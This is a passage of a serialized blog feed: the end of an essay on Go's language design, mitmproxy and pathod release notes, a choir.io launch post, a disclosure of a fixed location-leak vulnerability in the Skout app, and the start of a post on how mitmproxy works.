So, this code:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>s<\/span><span style=\"color: #D73A49;\"> :=<\/span><span style=\"color: #032F62;\"> &quot;a<\/span><span style=\"color: #005CC5;\">\\u00fc<\/span><span style=\"color: #032F62;\">b&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">for<\/span><span> a, b<\/span><span style=\"color: #D73A49;\"> := range<\/span><span> s {<\/span><\/span>\n<span class=\"giallo-l\"><span>    fmt.<\/span><span style=\"color: #6F42C1;\">Println<\/span><span>(a, b)<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>Prints this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>0 97<\/span><\/span>\n<span class=\"giallo-l\"><span>1 252<\/span><\/span>\n<span class=\"giallo-l\"><span>3 98<\/span><\/span><\/code><\/pre>\n<p>Notice the jump from 1 to 3 in the index, because the rune at offset 1 is\ntwo bytes wide in UTF-8. And look what happens when we now retrieve the value\nat that offset from the string. This:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>fmt.<\/span><span style=\"color: #6F42C1;\">Println<\/span><span>(s[<\/span><span style=\"color: #005CC5;\">1<\/span><span>])<\/span><\/span><\/code><\/pre>\n<p>Prints this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>195<\/span><\/span><\/code><\/pre>\n<p>What gives? At first glance, it's reasonable to expect this to print 252, as\nreturned by <strong>range<\/strong>. That's wrong, though, because string access by index\noperates on bytes, so what we're given is the first byte of the UTF-8 encoding\nof the rune. This is bound to cause subtle bugs. 
Code that works perfectly on\nASCII text simply due to the fact that UTF-8 encodes these in a single byte\nwill fail mysteriously as soon as non-ASCII characters appear.<\/p>\n<p>My argument here is that <strong>range<\/strong> is a very clear example of design directly\nfrom concrete use cases down, with little concern for consistency. In fact, the\ntable of <strong>range<\/strong> return values above is really just a compendium of use\ncases: at each point the result is simply the one that is most directly useful.\nSo, it makes total sense that ranging over strings returns runes. In fact,\ndoing anything else would arguably be incorrect. What's characteristic here is\nthat no attempt was made to reconcile this interface with the core of the\nlanguage. It serves the use case well, but feels jarring.<\/p>\n<h2 id=\"arrays-are-values-maps-are-references\">Arrays are values, maps are references<\/h2>\n<p>One final example along these lines. A core irregularity at the heart of Go is\nthat arrays are values, while maps are references. 
So, this code will\nmodify the <strong>s<\/strong> variable:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span style=\"color: #6F42C1;\"> mod<\/span><span>(<\/span><span style=\"color: #E36209;\">x<\/span><span style=\"color: #D73A49;\"> map<\/span><span>[<\/span><span style=\"color: #D73A49;\">int<\/span><span>]<\/span><span style=\"color: #D73A49;\"> int<\/span><span>){<\/span><\/span>\n<span class=\"giallo-l\"><span>    x[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #005CC5;\"> 2<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span style=\"color: #6F42C1;\"> main<\/span><span>() {<\/span><\/span>\n<span class=\"giallo-l\"><span>    s<\/span><span style=\"color: #D73A49;\"> := map<\/span><span>[<\/span><span style=\"color: #D73A49;\">int<\/span><span>]<\/span><span style=\"color: #D73A49;\">int<\/span><span>{}<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    mod<\/span><span>(s)<\/span><\/span>\n<span class=\"giallo-l\"><span>    fmt.<\/span><span style=\"color: #6F42C1;\">Println<\/span><span>(s)<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>And print:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>map[0:2]<\/span><\/span><\/code><\/pre>\n<p>While this code won't:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span style=\"color: #6F42C1;\"> mod<\/span><span>(<\/span><span style=\"color: #E36209;\">x<\/span><span> [<\/span><span style=\"color: 
#005CC5;\">1<\/span><span>]<\/span><span style=\"color: #D73A49;\">int<\/span><span>){<\/span><\/span>\n<span class=\"giallo-l\"><span>    x[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #005CC5;\"> 2<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span style=\"color: #6F42C1;\"> main<\/span><span>() {<\/span><\/span>\n<span class=\"giallo-l\"><span>    s<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> [<\/span><span style=\"color: #005CC5;\">1<\/span><span>]<\/span><span style=\"color: #D73A49;\">int<\/span><span>{}<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    mod<\/span><span>(s)<\/span><\/span>\n<span class=\"giallo-l\"><span>    fmt.<\/span><span style=\"color: #6F42C1;\">Println<\/span><span>(s)<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>And will print:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>[0]<\/span><\/span><\/code><\/pre>\n<p>This is undoubtedly inconsistent, but it turns out not to be an issue in\npractice, mostly because slices <em>are<\/em> references, and are passed around much\nmore frequently than arrays. This issue has surprised enough people to make it\ninto the Go FAQ, <a rel=\"external\" href=\"http:\/\/golang.org\/doc\/faq#references\">where the justification is as\nfollows<\/a>:<\/p>\n<blockquote>\n<p>There's a lot of history on that topic. Early on, maps and channels were\nsyntactically pointers and it was impossible to declare or use a non-pointer\ninstance. Also, we struggled with how arrays should work. Eventually we\ndecided that the strict separation of pointers and values made the language\nharder to use. 
This change added some regrettable complexity to the language\nbut had a large effect on usability: Go became a more productive, comfortable\nlanguage when it was introduced.<\/p>\n<\/blockquote>\n<p>This is not exactly the clearest explanation for a technical decision I've ever\nread, so allow me to paraphrase: \"Things evolved this way for pragmatic\nreasons, and consistency was never important enough to force a reconciliation\".<\/p>\n<h2 id=\"the-g-word\">The G Word<\/h2>\n<p>Now we get to that perpetual bugbear of Go critiques: the lack of generics.\nThis, I think, is the deepest example of the Go designers' willingness to\nsacrifice coherence for pragmatism. One gets the feeling that the Go devs are a\ntad weary of this argument by now, but the issue is substantive and worth\nfacing squarely. The crux of the matter is this: Go's built-in container types\nare super special. They can be parameterized with the type of their contained\nvalues in a way that user-written data structures can't be.<\/p>\n<p>The supported way to do generic data structures is to use blank interfaces.\nLet's look at an example of how this works in practice. 
First, here is a simple\nuse of the built-in slice type.<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>l<\/span><span style=\"color: #D73A49;\"> :=<\/span><span style=\"color: #6F42C1;\"> make<\/span><span>([]<\/span><span style=\"color: #D73A49;\">string<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>l[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #032F62;\"> &quot;foo&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>str<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> l[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><\/span><\/code><\/pre>\n<p>In the first line we create a slice with the element type <strong>string<\/strong>. We then\ninsert a value, and in the final line, we retrieve it. At this point, <strong>str<\/strong>\nhas type <strong>string<\/strong> and is ready to use. The user-written analogue of this\nmight be a modest data structure with <strong>put<\/strong> and <strong>get<\/strong> methods. 
We can\ndefine this using interfaces like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">type<\/span><span style=\"color: #6F42C1;\"> gtype<\/span><span style=\"color: #D73A49;\"> struct<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span>    data<\/span><span style=\"color: #D73A49;\"> interface<\/span><span>{}<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span> (<\/span><span style=\"color: #E36209;\">t <\/span><span style=\"color: #D73A49;\">*<\/span><span style=\"color: #6F42C1;\">gtype<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> put<\/span><span>(<\/span><span style=\"color: #E36209;\">v<\/span><span style=\"color: #D73A49;\"> interface<\/span><span>{}) {<\/span><\/span>\n<span class=\"giallo-l\"><span>    t.data<\/span><span style=\"color: #D73A49;\"> =<\/span><span> v<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">func<\/span><span> (<\/span><span style=\"color: #E36209;\">t <\/span><span style=\"color: #D73A49;\">*<\/span><span style=\"color: #6F42C1;\">gtype<\/span><span>)<\/span><span style=\"color: #6F42C1;\"> get<\/span><span>()<\/span><span style=\"color: #D73A49;\"> interface<\/span><span>{} {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> t.data<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>To use this structure, we would say:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>v<\/span><span style=\"color: #D73A49;\"> :=<\/span><span style=\"color: #6F42C1;\"> gtype<\/span><span>{}<\/span><\/span>\n<span class=\"giallo-l\"><span>v.<\/span><span style=\"color: 
#6F42C1;\">put<\/span><span>(<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>str<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> v.<\/span><span style=\"color: #6F42C1;\">get<\/span><span>().(<\/span><span style=\"color: #D73A49;\">string<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>We can assign a string to a variable with the empty interface type without\ndoing anything special, so <strong>put<\/strong> is simple. However, we need to use a type\nassertion on the way out, otherwise the <strong>str<\/strong> variable will have type\n<strong>interface{}<\/strong>, which is probably not what we want.<\/p>\n<p>There are a number of issues here. It's cosmetically bothersome that we have to\nplace the burden of type assertion on the caller of our data structure, making\nthe interface just a little bit less nice to use. But the problems extend\nbeyond syntactic inconvenience - there's a substantive difference between these\ntwo ways of doing things. Trying to insert a value of the wrong type into the\nbuilt-in slice causes a compile-time error, but the type assertion acts at\nrun-time and causes a panic on failure. The blank-interface paradigm sidesteps\nGo's compile-time type checking, negating any benefit we may have received from\nit.<\/p>\n<p>The biggest issue for me, though, is the conceptual inconsistency. This is\nsomething that's difficult to put into words, so here's a picture:<\/p>\n<div class=\"media\">\n    <a href=\"inconsistency.jpg\">\n        <img src=\"inconsistency.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The fact that the built-in containers magically do useful things that\nuser-written code can't irks me. It hasn't become less jarring over time, and\nstill feels like a bit of grit in my eye that I can't get rid of. 
I might be an\nextreme case, but this is an aesthetic instinct that I think is shared by many\nprogrammers, and would have convinced many language designers to approach the\nproblem differently.<\/p>\n<p>The extent to which Go's lack of generics is a critical problem, however, is\nnot the point here. The meat of the matter is <strong>why<\/strong> this design decision was\ntaken, and what it reveals about the character of Go. Here's how the lack of\ngenerics is <a rel=\"external\" href=\"http:\/\/blog.golang.org\/go-at-io-frequently-asked-questions\">justified by the Go\ndevelopers<\/a>:<\/p>\n<blockquote>\n<p>Many proposals for generics-like features have been mooted both publicly and\ninternally, but as yet we haven't found a proposal that is consistent with\nthe rest of the language. We think that one of Go's key strengths is its\nsimplicity, so we are wary of introducing new features that might make the\nlanguage more difficult to understand.<\/p>\n<\/blockquote>\n<p>Instead of creating the atomic elements needed to support generic data\nstructures then adding a suite of them to the standard library, the Go team\nwent the other way. There was a concrete use case for good data structures, and\nso they were added. Attempting a deep reconciliation with the rest of the\nlanguage was a secondary requirement that was so unimportant that it fell by\nthe wayside for Go 1.x.<\/p>\n<h1 id=\"a-pragmatic-beauty\">A Pragmatic Beauty<\/h1>\n<p>Let's over-simplify for a moment and divide languages into two extreme camps. On\nthe one hand, you have languages that are highly consistent, with most higher\norder functionality deriving from the atomic elements of the language. In this\ncamp, we can find languages like Lisp. On the other hand are languages that are\nshamelessly eager to please. They tend to grow organically, sprouting syntax as\nneeded to solve specific pragmatic problems. 
As a consequence, they tend to be\nlarge, syntactically diverse, not terribly coherent, and, occasionally,\neven <a rel=\"external\" href=\"http:\/\/www.perlmonks.org\/?node_id=663393\">unparseable<\/a>. In this\ncamp, we find languages like Perl. It's tempting to think that there exists a\nlanguage somewhere in the infinite multiverse of possibilities that unites\nperfect consistency and perfect usability, but if there is, we haven't found\nit. The reality is that all languages are a compromise, and that balancing\nthese two forces against each other is really what makes language design so\nhard. Placing too much value on consistency constrains the human concessions we\ncan make for mundane use cases. Making too many concessions results in a\nlanguage that lacks coherence.<\/p>\n<p>Like many programmers, I instinctively prefer purity and consistency and\ndistrust \"magic\". In fact, I've never found a language with a strongly\npragmatic bent that I really liked. Until now, that is. Because there's one\nthing I'm pretty clear on: Go is on the Perl end of this language design\nspectrum. It's designed firmly from concrete use cases down, and shows its\nwillingness to sacrifice consistency for practicality again and again. The\neffects of this design philosophy permeate the language. This, then, is the\nsource of my initial dissatisfaction with Go: I'm pre-disposed to dislike many\nof its core design decisions.<\/p>\n<p>Why, then, has the language grown on me over time? Well, I've gradually become\nconvinced that practically-motivated flaws like the ones I list in this post\nadd up to create Go's unexpected nimbleness. There's a weird sort of alchemy\ngoing on here, because I think any one of these decisions in isolation makes Go\na worse language (even if only slightly). Together, however, they jolt Go out\nof a local maximum many procedural languages are stuck in, and take it\nsomewhere better. 
Look again at each of the cases above, and imagine what the\ncumulative effect on Go would have been if the consistent choice had been made\neach time. The language would have more syntax, more core concepts to deal\nwith, and be more verbose to write. Once you reason through the repercussions,\nyou find that the result would have been a worse language overall. It's clear\nthat Go is not the way it is because its designers didn't know better, or\ndidn't care. Go is the result of a conscious pragmatism that is deep and\naudacious. Starting with this philosophy, but still managing to keep the\nlanguage small and taut, with almost nothing dispensable or extraneous, took\ngreat discipline and insight, and is a remarkable achievement.<\/p>\n<p>So, despite its flaws, Go remains graceful. It just took me a while to\nappreciate it, because I expected the grace of a ballet dancer, but found the\ngrace of a battered but experienced bar-room brawler.<\/p>\n<p>--<\/p>\n<p>Edited to remove some inaccuracies about channels.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">3<\/sup>\n<p>Simplified from <a rel=\"external\" href=\"https:\/\/code.google.com\/p\/go-wiki\/wiki\/Range\">here<\/a>.<\/p>\n<\/div>\n<div class=\"footnote-definition\" id=\"2\"><sup class=\"footnote-definition-label\">2<\/sup>\n<p>I don't mean mundane details like the syntax and core concepts of a\nlanguage. 
In the case of Go, you can get a handle on these in an hour by\nreading the language specification.<\/p>\n<\/div>\n<div class=\"footnote-definition\" id=\"3\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>Pedant hedge: yes, the illusion isn't perfect, and there are in fact\nsubtle ways in which Python dictionaries are not just objects like any other.<\/p>\n<\/div>\n"},{"title":"mitmproxy and pathod 0.9.2","published":"2013-08-25T00:00:00+00:00","updated":"2013-08-25T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9_2\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9_2\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\">\n        <img src=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just released v0.9.2 of both <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> and\n<a rel=\"external\" href=\"http:\/\/pathod.org\">pathod<\/a>. This is a bugfix release, chiefly to address two\ncrashing issues affecting mitmproxy when relaying SSL traffic. A range of other\nfixes and improvements are also included - if you use mitmproxy, you should\nupgrade.<\/p>\n<h2 id=\"changelog\">CHANGELOG<\/h2>\n<ul>\n<li>Improvements to the mitmproxywrapper.py helper script for OSX.<\/li>\n<li>Don't take minor version into account when checking for serialized file\ncompatibility.<\/li>\n<li>Fix a bug causing resource exhaustion under some circumstances for SSL\nconnections.<\/li>\n<li>Revamp the way we store interception certificates. We used to store these\non disk, they're now in-memory. 
This fixes a race condition related to\ncert handling, and improves compatibility with Windows, where the rules\ngoverning permitted file names are weird, resulting in errors for some\nvalid IDNA-encoded names.<\/li>\n<li>Display transfer rates for responses in the flow list.<\/li>\n<li>Many other small bugfixes and improvements.<\/li>\n<\/ul>\n"},{"title":"Introducing choir.io","published":"2013-08-16T00:00:00+00:00","updated":"2013-08-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/choir\/intro\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/choir\/intro\/","content":"<div class=\"media\">\n    <a href=\"choir.png\">\n        <img src=\"choir.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        choir.io\n    <\/div>\n    \n<\/div>\n<p>Today, I'm raising the veil (slightly) on a new project -\n<a rel=\"external\" href=\"https:\/\/choir.io\">choir.io<\/a>. The most succinct description of choir.io is that\nit is a service that turns events into sound. Why would you want to do that?\nWell, I believe that there are compelling reasons to make sound part of your\nmonitoring stack. Let's see if I can convince you.<\/p>\n<h2 id=\"the-soundscape\">The soundscape<\/h2>\n<p>When I walk into my study every morning, I'm surrounded by a rich, subtle\nsoundscape that exists just beneath conscious perception. My air-conditioner,\ncomputers and monitors all emit hums and purrs. I can \"tune in\" to these if I\nfocus, but they usually only draw my attention when something changes. When the\npower goes out there is a deathly silence; when a CPU fan noise changes pitch\nor texture, it bothers me immediately.<\/p>\n<p>Layered over this background are more obtrusive sounds, closer to the threshold\nof awareness - the clacking of keyboards, faint noises of my family getting\nready for their day upstairs, the front door opening and closing. Whether or\nnot I pay attention to these is somewhat context dependent. 
Am I waiting, for\ninstance, for my wife and kids to start trooping down the stairs so I can join\nthem for my son's swimming lesson? If I am, I listen out for those sounds\nspecifically. I get an enormous amount of information about my world from these\nmore discrete, event-related noises.<\/p>\n<p>Finally, there are the really obtrusive sounds, things that immediately get my\nattention. This might be someone saying my name, my phone ringing, a knock at\nthe door, or a smoke alarm. I'm very aware of these, and they usually signal\nsomething I have to deal with immediately.<\/p>\n<p>These layers of more and less obtrusive sounds form a soundscape that is\never-present, and utterly necessary in our day-to-day lives. Notice how\neffortless this process of extracting meaning from our ambient sounds is. Our\nminds process this information stream without any mental exertion, filter out\nwhat we don't need to notice, and draw our attention to what we do. There's a\nlot of cognitive research (that I might delve into in future posts) that shows\nthat our brains and auditory systems are specifically designed to make sense of\nthe world in this way.<\/p>\n<p>We have nothing like this rich texture of ambient awareness for the technology\nthat surrounds us. Our monitoring mechanisms seem to be stuck at the ends of\nthe intrusiveness spectrum. At one end, we have email notifications that demand\nour attention until we start to ignore them or silence them with a filter. At\nthe other end we have passive status dashboards that require us to remember to\nswitch context and visually consult a different interface. Choir.io doesn't aim\nto supplant either of these, but tries to fill in the blank portion of the\nawareness spectrum between them.<\/p>\n<p>When I sit at my desk, I can hear our server architecture humming away. There's\nthe subtle pitter-patter of hits to various webservers, the occasional clack of\nan SSH login. 
Occasionally there is a chime when @alexdong pushes to Github,\nfollowed shortly by the celebratory cheer of a server deploy. When I hear the\njarring note of a 500 server error, I switch context to view logs or a\ndashboard, but otherwise my focus stays with my editor window. Choir is young,\nbut it's already become an indispensable part of my life.<\/p>\n<h2 id=\"challenges-and-next-steps\">Challenges and next steps<\/h2>\n<p>There are a number of key questions that we'd like to answer with the help of\nour intrepid early adopters. First among these is the question of soundscape\ndesign. What makes a good sound pack? What is the right mix of intrusive and\nnon-intrusive sounds? How do we construct soundscapes that blend into the\nbackground like natural sounds do? Another set of questions surrounds the API\nand integration. What is the right blend of simplicity and power in the API?\nWhich services should we integrate with next?<\/p>\n<p>There are some obvious next steps in the works. We recognize that sound pack\ndesign is a deep problem with subjective solutions. So, letting users assemble,\nedit and eventually share their own sound packs is high on our list of\npriorities. Free-standing Choir.io player apps for Windows and OSX will also be\non the way soon, so you won't need to remember to keep a browser tab open.\nTechnical improvements to the API that are on the way include UDP and SSL\nsupport.<\/p>\n<p>Choir is trying to do something new, and we want as much feedback as early in\nthe process as possible. So, we've decided to start sending out invites today,\neven though Choir is far from the polished system that it will be in a few\nmonths. 
If you're brave, willing to give frank feedback, and want to help us\nexplore this exciting idea, please <a rel=\"external\" href=\"https:\/\/choir.io\">request an invite<\/a>.<\/p>\n"},{"title":"mitmproxy 0.9.1","published":"2013-06-16T00:00:00+00:00","updated":"2013-06-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9_1\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_9_1\/","content":"<div class=\"media\">\n    <a href=\"mitmproxy_0_9_1.png\">\n        <img src=\"mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce the release of <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy 0.9.1<\/a>.\nThis is a bugfix release, with no significant changes in behaviour.<\/p>\n<p>As hinted in my previous release note, the project itself is also evolving. As\nof this release, mitmproxy and its sister projects (<a rel=\"external\" href=\"http:\/\/pathod.net\">pathod<\/a>\nand <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/netlib\">netlib<\/a>) are housed under a separate\norganization on Github, rather than my own personal space:<\/p>\n<p><a class=\"btn\" href=\"https:\/\/github.com\/mitmproxy\">github.com\/mitmproxy<\/a><\/p>\n<p>I'm also very happy to welcome the first external core developer to the\nmitmproxy project: <a rel=\"external\" href=\"http:\/\/maximilianhils.com\/\">Maximilian Hils<\/a>. Max is the\nauthor of <a rel=\"external\" href=\"http:\/\/honeyproxy.org\/\">HoneyProxy<\/a>, a web analysis front-end for\nmitmproxy. In the next few months, he'll be working on integrating and\nexpanding his work to become mitmproxy's official web interface. 
Max's efforts\nwill be sponsored by Google under their <a rel=\"external\" href=\"http:\/\/www.google-melange.com\/gsoc\/homepage\/google\/gsoc2013\">Summer of\nCode<\/a> program, and\nwill be mentored by the <a rel=\"external\" href=\"http:\/\/www.honeynet.org\/\">HoneyNet Project<\/a>.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>Use \"correct\" case for Content-Type headers added by mitmproxy.<\/li>\n<li>Make UTF environment detection more robust.<\/li>\n<li>Improved MIME-type detection for viewers.<\/li>\n<li>Always read files in binary mode (Windows compatibility fix).<\/li>\n<li>Correct PyOpenSSL dependency declaration.<\/li>\n<li>Some developer documentation.<\/li>\n<\/ul>\n"},{"title":"Skout: a devastating privacy vulnerability","published":"2013-05-31T00:00:00+00:00","updated":"2013-05-31T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/skout\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/skout\/","content":"<p>I've become a bit weary of the process of public vulnerability disclosure - I'm\nmuch more likely nowadays to just drop companies an anonymous notice and move\non. Every so often, though, I come across an issue so egregious that talking\nabout it publicly seems like an imperative. This is one of them.<\/p>\n<p>First, some background. Skout is a location-based mobile social network. The\nidea is to allow people to meet others in their area, semi-anonymously, get to\nknow them, and then perhaps line up a meeting in meatspace. As far as I can\ntell, a huge fraction of the userbase are singles, using Skout as an ad-hoc\ndating app. 
Skout's scale is significant - they don't release exact user\nnumbers, but I've seen claims of more than 10 million users, and a growth rate\nof a million users per month.<\/p>\n<p>In 2012, Skout went through a major PR catastrophe, when its service was linked\nto <a rel=\"external\" href=\"http:\/\/bits.blogs.nytimes.com\/2012\/06\/12\/after-rapes-involving-children-skout-a-flirting-app-faces-crisis\/\">no fewer than 3 separate rapes of\nchildren<\/a>\nby adult men posing as teenagers. Skout immediately suspended the service for\nteenagers and went through a security re-vamp. A month later, <a rel=\"external\" href=\"http:\/\/blog.skout.com\/2012\/07\/13\/teens-welcome-back-to-skout\/\">teens were\nallowed back<\/a>,\nwith Skout making much of its new safety system, \"advanced, proprietary\nalgorithms\" to weed out stalkers, and its long-term commitment to community\nsafety.<\/p>\n<p>Given this background, the problem I found is simple but devastating. The Skout\nmobile application talks to Skout's servers through a simple API. When a user's\nprofile is viewed, an unencrypted, plain-HTTP request is made to a path like\nthis:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>http:\/\/i22.skout.com\/services\/ServerService\/getProfile<\/span><\/span><\/code><\/pre>\n<p>What's returned is a blob of XML containing the user's complete profile data.\nIn fact, the profile data is <em>too<\/em> complete, including some bits of\ninformation that are never actually used by the app. For example, we can see the\nuser's exact date of birth:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"xml\"><span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">ax213:birthdayDate<\/span><span>&gt;xx\/xx\/1995&lt;\/<\/span><span style=\"color: #22863A;\">ax213:birthdayDate<\/span><span>&gt;<\/span><\/span><\/code><\/pre>\n<p>... 
but only the user's age in years is actually displayed. Most serious,\nhowever, is the high-precision location information that is returned in the\nax213:homeLocation and ax213:location tags:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"xml\"><span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">ax213:latitude<\/span><span>&gt;-xx.xxx&lt;\/<\/span><span style=\"color: #22863A;\">ax213:latitude<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">ax213:longitude<\/span><span>&gt;xxx.xxx&lt;\/<\/span><span style=\"color: #22863A;\">ax213:longitude<\/span><span>&gt;<\/span><\/span><\/code><\/pre>\n<p>The three decimal places of precision in the co-ordinates is enough to locate a\nuser to within about 110 meters north-south, and substantially less than that\neast-west depending on the distance from the equator. Here's what that looks\nlike in a hypothetical example:<\/p>\n<div class=\"media\">\n    <a href=\"skout-map.png\">\n        <img src=\"skout-map.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I used <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> to observe Skout's traffic, but\nbecause the request is unencrypted any tool that allows you to inspect network\ntraffic would be enough. The result is a stalker's wet dream - click on an\nanonymous profile, watch your network traffic, and find out exactly where the\nvictim lives. I've also seen minors located at malls where they hang out, and\nat their schools... Given the scale of Skout's userbase and the ease with which\nthe data can be obtained, I think there's a high likelihood that this issue has\nalready been used for unsavoury purposes.<\/p>\n<p>I reported the vulnerability to Skout on the 24th of May. I'm happy to report\nthat they immediately realised the seriousness of the situation, and their API\nstopped returning exact lat\/long values a few hours later. 
Subsequent\ncorrespondence with Niklas Lindstrom, Skout's CTO, confirmed that they were\ntaking steps to tighten security. I've encouraged Skout to speak about this\npublicly - their userbase needs to know about the issue, and needs to be\nreassured that action is being taken to ensure that this type of privacy breach\nwon't ever recur.<\/p>\n"},{"title":"How mitmproxy works","published":"2013-05-16T00:00:00+00:00","updated":"2013-05-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/howitworks\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/howitworks\/","content":"<p>I started work on <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> because I was frustrated\nwith the available interception tools. I had a long list of minor complaints -\nthey were insufficiently flexible, not programmable enough, mostly written in\nJava (a language I don't enjoy), and so forth. My most serious problem, though,\nwas opacity. The best tools were all closed source and commercial. SSL\ninterception is a complicated and delicate process, and after a certain point,\nnot understanding precisely what your proxy is doing just doesn't fly.<\/p>\n<p>The text below is now part of the <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/index.html\">official\ndocumentation<\/a> of mitmproxy. It's a\ndetailed description of mitmproxy's interception process, and is more or less\nthe overview document I wish I had when I first started the project. 
